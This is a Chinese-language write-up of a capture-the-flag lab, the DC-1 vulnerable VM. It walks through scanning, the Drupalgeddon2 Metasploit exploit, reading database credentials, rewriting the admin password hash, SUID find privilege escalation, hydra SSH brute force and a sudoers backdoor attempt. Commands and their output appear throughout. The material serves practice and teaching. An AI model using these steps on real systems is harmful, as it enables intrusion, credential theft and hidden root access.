DC-1 靶机渗透
DC-1 靶机渗透
1.渗透过程
直接开始~~
IP发现
netdiscover
找到一个ip为
192.168.0.119
的机器给他扫下端口
nmap -sT T4 -v -p- 192.168.0.119 -oN /tmp/res.txt
结果如下
# Nmap 7.70 scan initiated Fri Apr 24 14:34:40 2020 as: nmap -sT -v -p- -oN /tmp/res.txt T4 192.168.0.119
Nmap scan report for T4 (223.82.248.117) [host down]
Nmap scan report for 192.168.0.119
Host is up (0.00017s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
47675/tcp open unknown
MAC Address: 00:0C:29:D0:43:83 (VMware)
Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Apr 24 14:34:45 2020 -- 2 IP addresses (1 host up) scanned in 5.79 seconds
有个
rpcbind
没见过的百度了一下:RPC是远程过程调用(Remote Procedure Call)的缩写形式。SAP系统RPC调用的原理其实很简单,有一些类似于三层构架的C/S系统,第三方的客户程序通过接口调用SAP内部的标准或自定义函数,获得函数返回的数据进行处理后显示或打印。
接着就是用
nikto
扫描一下web服务让他先扫描…
nikto扫描得到两个比较有用的地址
http://192.168.0.119/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 #这个是phpinfo()
http://192.168.0.119/xmlrpc.php #这个只有这样一句话:XML-RPC server accepts POST requests only.
也不知道咋用啊。。。。
我们进浏览器看看
就是一个登录的页面?
用插件
wappalyzer
看到web的框架是Drupal 7
先看看存不存在框架漏洞
直接启动我们的神器:
msfconsole
搜索一下框架漏洞
search Drupal
找到好几个呢,我们直接使用最新的
Name:
exploit/unix/webapp/drupal_drupalgeddon2
Disclosure Date:
2018-03-28
Rank:
excellent
Check:
Yes
Description:
Drupal Drupalgeddon 2 Forms API Property Injection
(Drupal Drupalgeddon 2表单API属性注入)
show options
看看要什么参数,
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR
#只要设置这个就能跑了
那就设置:
set RHOST 192.168.0.119
接着就是激动人心的时刻了:
exploit
得到一个会话,成了~
[*] Sending stage (38247 bytes) to 192.168.0.119
[*] Meterpreter session 1 opened (192.168.0.21:4444 -> 192.168.0.119:34430) at 2020-04-24 15:40:03 +0800
meterpreter > shell
#获得标准shell
python -c 'import pty;pty.spawn("/bin/bash")'
ls
一下,看到一个flag1.txt
的文件cat
一下:
Every good CMS needs a config file - and so do you.
#每一个好的CMS都需要一个配置文件-你也是。
找配置文件?不知道
百度去~
找到是在
/var/www/sites/default/setting.php
cat
一下
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
* 不是暴力和字典攻击
* 只有获得访问权限的方法(而且您将需要访问权限)。
* 你能用这些证件做什么?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
找到了flag2,还看到了数据库的账号密码
登录
mysql
看看
mysql -udbuser -pR0ck3t
- 我们先看看有什么数据库
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.02 sec)
没有mysql库
~_~||
那就进
drupaldb
看看网站的登录密码吧~use drupaldb
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
好多表啊~~
有个
users
我们查询一下
select uid,name,pass from users;
+-----+-------+---------------------------------------------------------+
| uid | name | pass |
+-----+-------+---------------------------------------------------------+
| 0 | | |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
+-----+-------+---------------------------------------------------------+
3 rows in set (0.00 sec)
这后面是什么鬼密码??
不是MD5,咋办
~找官网搜索密码重置
最后在
https://www.drupal.org/node/1023428
找到相关方法说执行
./scripts/password-hash.sh newpwd
可以得到一个新密码那我们把它admin用户的密码给改了
./scripts/password-hash.sh 1234
password: 1234
hash: $S$DSM0f3PE7gij.NOoFJC2nqT1A8.1M6hh5LHeeQ62d.ghV0I9yz6U
- 进数据库给他改了
update set pass='$S$DSM0f3PE7gij.NOoFJC2nqT1A8.1M6hh5LHeeQ62d.ghV0I9yz6U' from users where uid=1;
Query OK, 1 row affected (0.06 sec)
Rows matched: 1 Changed: 1 Warnings: 0
登录网站。点击上面的
content
找到一篇
flag3
的文章内容是:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
找到关键信息:
FIND -exec
和shadow
;那我们去看看
/etc/shadow
文件:
cat: /etc/shadow: Permission denied
没有权限?
那
/etc/passwd
呢?
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
- 找到一个
flag4
的用户home目录在/home/flag4
ls /home/flag4
flag4.txt
- 有一个
flag4.txt
我们试着读取一下
cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
您可以使用相同的方法在根目录中查找或访问标志吗?
可能。但也许不是那么容易。或许是这样?
- 在根目录查找?
#用find'随便查找一个文件 然后-exec 来启shell
find ./ xxx -exec '/bin/sh' \;
得到一个有root权限的shell
cd
到/root
下:
# 有一个thefinalflag.txt文件
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
完成了~
给他留个用户吧~
#创建一个可以登录的用户在root并设置密码
useradd rex -m -s /bin/bash -d /home/rex -g root;passwd rex
#给他root权限
chmod u+w /etc/sudoers;echo 'rex ALL=(ALL:ALL) ALL' >> /etc/sudoers;chmod u-w /etc/sudoers
- 不料:
/bin/sh: 20: useradd: not found #没有useradd这个命令?
额嘿嘿,5个flag都拿到了,算了算了。
后来爆破了flag4的密码:
#爆破密码:
hydra -l flag4 -P /tmp/password.lst -t 5 ssh://192.168.0.119
# 密码字典在 /usr/share/john/password.lst
# 也可以自己定制
2.重要信息
#1. mysql 账号密码:
user:dbuser passwd:R0ck3t
#2. ssh 的账号密码:
user:flag4 passwd orange
3. flag
# flag1
# 在网站的目录下
# 内容是:
Every good CMS needs a config file - and so do you.
#每一个好的CMS都需要一个配置文件-你也是。
# flag2
# 在/var/www/sites/default/setting.php (网站框架的配置文件)
# 内容是:
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
* 暴力和字典攻击不是
* 只有获得访问权限的方法(而且您将需要访问权限)。
* 你能用这些证件做什么?
*
*/
# flag3
# 在网站登录后的content里面
# 内容是:
"Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow."
# flag4
# /home/flag4/flag4.txt 在服务器用户‘flag4’家目录下的flag4.txt
# 内容是:
`Can you use this same method to find or access the flag in root?`
`Probably. But perhaps it's not that easy. Or maybe it is?`
# 您可以使用相同的方法在根目录中查找或访问标志吗?
# 可能。但也许不是那么容易。或许是这样?
# flag5
# /root/thefinalflag.txt root用户目录下的thefinalflag.txt文件
# 内容是:
"Well done!!!!"
"Hopefully you've enjoyed this and learned some new skills."
"You can let me know what you thought of this little journey"
"by contacting me via Twitter - @DCAU7"
4. 补充知识
find命令提权
find . -exec '/bin/sh' \; #如果find命令是-r-sr-sr-x权限那执行之后回获得一个root的shell
#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -user root -perm -4000 -print 2>/dev/null #查找 suid的文件
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
THE_END
文章来自于网络,如果侵犯了您的权益,请联系站长删除!